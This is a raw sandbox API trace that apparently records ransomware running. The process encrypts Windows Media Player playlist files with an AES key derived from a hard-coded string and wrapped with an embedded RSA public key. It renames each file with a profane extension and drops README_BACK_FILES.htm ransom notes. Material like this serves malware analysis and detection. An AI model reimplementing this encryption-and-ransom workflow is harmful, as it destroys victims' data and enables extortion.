WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.321] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0xa7, lpOverlapped=0x0) returned 1 [0268.321] CryptEncrypt (in: hKey=0x2938378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0xa7, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0xb0) returned 1 [0268.321] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0xb0, lpOverlapped=0x0) returned 1 [0268.321] CloseHandle (hObject=0x5d50) returned 1 [0268.321] CloseHandle (hObject=0x5d4c) returned 1 [0268.322] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\10_All_Music.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\10_all_music.wpl.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\10_All_Music.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\10_all_music.wpl"), bFailIfExists=0) returned 1 [0268.324] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\10_All_Music.wpl", dwFileAttributes=0x0) returned 1 [0268.325] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\10_All_Music.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\10_all_music.wpl.gsg")) returned 1 [0268.326] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\10_All_Music.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\10_all_music.wpl"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\10_All_Music.wpl.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\10_all_music.wpl.fuck")) returned 1 [0268.328] CryptDestroyHash (hHash=0x2e18828) returned 1 [0268.328] CryptDestroyKey (hKey=0x2938378) returned 1 [0268.328] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0268.328] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0268.328] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0268.328] GetLastError () returned 0x0 [0268.328] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\11_All_Pictures.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\11_all_pictures.wpl")) returned 0x20 [0268.328] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\11_All_Pictures.wpl", dwFileAttributes=0x80) returned 1 [0268.329] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\11_All_Pictures.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0268.329] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\11_All_Pictures.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\11_all_pictures.wpl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0268.330] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\11_All_Pictures.wpl.gsg", dwFileAttributes=0x2) returned 1 [0268.331] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2f25df0) returned 1 [0268.333] CryptCreateHash (in: hProv=0x2f25df0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0268.333] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0268.333] CryptHashData (hHash=0x29383f8, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.333] CryptDeriveKey (in: hProv=0x2f25df0, Algid=0x6610, hBaseData=0x29383f8, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2e7f4c0) returned 1 [0268.333] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.333] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0268.333] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2f263c8) returned 1 [0268.333] CryptImportPublicKeyInfo (in: hCryptProv=0x2f263c8, dwCertEncodingType=0x1, pInfo=0x2f30fe0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f31010*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f31018*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2e7f500) returned 1 [0268.333] CryptEncrypt (in: hKey=0x2e7f500, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0268.334] CryptEncrypt (in: hKey=0x2e7f500, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f25a38*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2f25a38*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0268.334] WriteFile (in: hFile=0x5d50, lpBuffer=0x2f25a38*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2f25a38*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0268.335] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x249, lpOverlapped=0x0) returned 1 [0268.335] CryptEncrypt (in: hKey=0x2e7f4c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x249, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x250) returned 1 [0268.336] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x250, lpOverlapped=0x0) returned 1 [0268.337] CloseHandle (hObject=0x5d4c) returned 1 [0268.337] CloseHandle (hObject=0x5d50) returned 1 [0268.337] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\11_All_Pictures.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\11_all_pictures.wpl.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\11_All_Pictures.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\11_all_pictures.wpl"), bFailIfExists=0) returned 1 [0268.339] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\11_All_Pictures.wpl", dwFileAttributes=0x0) returned 1 [0268.340] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\11_All_Pictures.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\11_all_pictures.wpl.gsg")) returned 1 [0268.341] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\11_All_Pictures.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\11_all_pictures.wpl"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\11_All_Pictures.wpl.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\11_all_pictures.wpl.fuck")) returned 1 [0268.342] CryptDestroyHash (hHash=0x29383f8) returned 1 [0268.342] CryptDestroyKey (hKey=0x2e7f4c0) returned 1 [0268.342] CryptReleaseContext (hProv=0x2f25df0, dwFlags=0x0) returned 1 [0268.342] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0268.342] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0268.342] GetLastError () returned 0x0 [0268.343] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\12_All_Video.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\12_all_video.wpl")) returned 0x20 [0268.343] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\12_All_Video.wpl", dwFileAttributes=0x80) returned 1 [0268.344] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\12_All_Video.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0268.345] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\12_All_Video.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\12_all_video.wpl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0268.348] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\12_All_Video.wpl.gsg", dwFileAttributes=0x2) returned 1 [0268.349] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2f24b58) returned 1 [0268.351] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0268.351] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0268.351] CryptHashData (hHash=0x2e7f8c0, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.351] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2e7f8c0, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2e18828) returned 1 [0268.352] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.352] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0268.352] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2f264d8) returned 1 [0268.352] CryptImportPublicKeyInfo (in: hCryptProv=0x2f264d8, dwCertEncodingType=0x1, pInfo=0x2f30bd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f30c00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f30c08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2e18128) returned 1 [0268.352] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0268.352] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f26560*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2f26560*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0268.352] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f26560*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2f26560*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0268.353] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.368] CryptEncrypt (in: hKey=0x2e18828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0268.368] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.370] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0xb7, lpOverlapped=0x0) returned 1 [0268.370] CryptEncrypt (in: hKey=0x2e18828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0xb7, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0xc0) returned 1 [0268.370] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0xc0, lpOverlapped=0x0) returned 1 [0268.370] CloseHandle (hObject=0x5d50) returned 1 [0268.371] CloseHandle (hObject=0x5d4c) returned 1 [0268.371] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\12_All_Video.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\12_all_video.wpl.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\12_All_Video.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\12_all_video.wpl"), bFailIfExists=0) returned 1 [0268.377] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\12_All_Video.wpl", dwFileAttributes=0x0) returned 1 [0268.377] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\12_All_Video.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\12_all_video.wpl.gsg")) returned 1 [0268.379] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\12_All_Video.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\12_all_video.wpl"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\12_All_Video.wpl.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\12_all_video.wpl.fuck")) returned 1 [0268.380] CryptDestroyHash (hHash=0x2e7f8c0) returned 1 [0268.380] CryptDestroyKey (hKey=0x2e18828) returned 1 [0268.380] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0268.380] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0268.380] FindClose (in: hFindFile=0x2e7ec80 | out: hFindFile=0x2e7ec80) returned 1 [0268.381] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\readme_back_files.htm")) returned 0xffffffff [0268.381] AreFileApisANSI () returned 1 [0268.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 112 [0268.381] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0268.382] GetFileType (hFile=0x5d48) returned 0x1 [0268.382] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0268.383] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0268.383] FindClose (in: hFindFile=0x2e7eb80 | out: hFindFile=0x2e7eb80) returned 1 [0268.383] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\readme_back_files.htm")) returned 0xffffffff [0268.384] AreFileApisANSI () returned 1 [0268.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 103 [0268.384] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0268.385] GetFileType (hFile=0x5d3c) returned 0x1 [0268.385] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0268.386] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0268.386] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0268.387] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\readme_back_files.htm")) returned 0xffffffff [0268.387] AreFileApisANSI () returned 1 [0268.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e29b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0268.387] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0268.389] GetFileType (hFile=0x5d44) returned 0x1 [0268.389] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0268.391] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0268.391] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2938378 [0268.392] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0268.392] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0268.392] FindClose (in: hFindFile=0x2938378 | out: hFindFile=0x2938378) returned 1 [0268.392] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\transcoded files cache\\readme_back_files.htm")) returned 0xffffffff [0268.393] AreFileApisANSI () returned 1 [0268.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0268.393] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\transcoded files cache\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0268.394] GetFileType (hFile=0x5d44) returned 0x1 [0268.395] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0268.396] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) 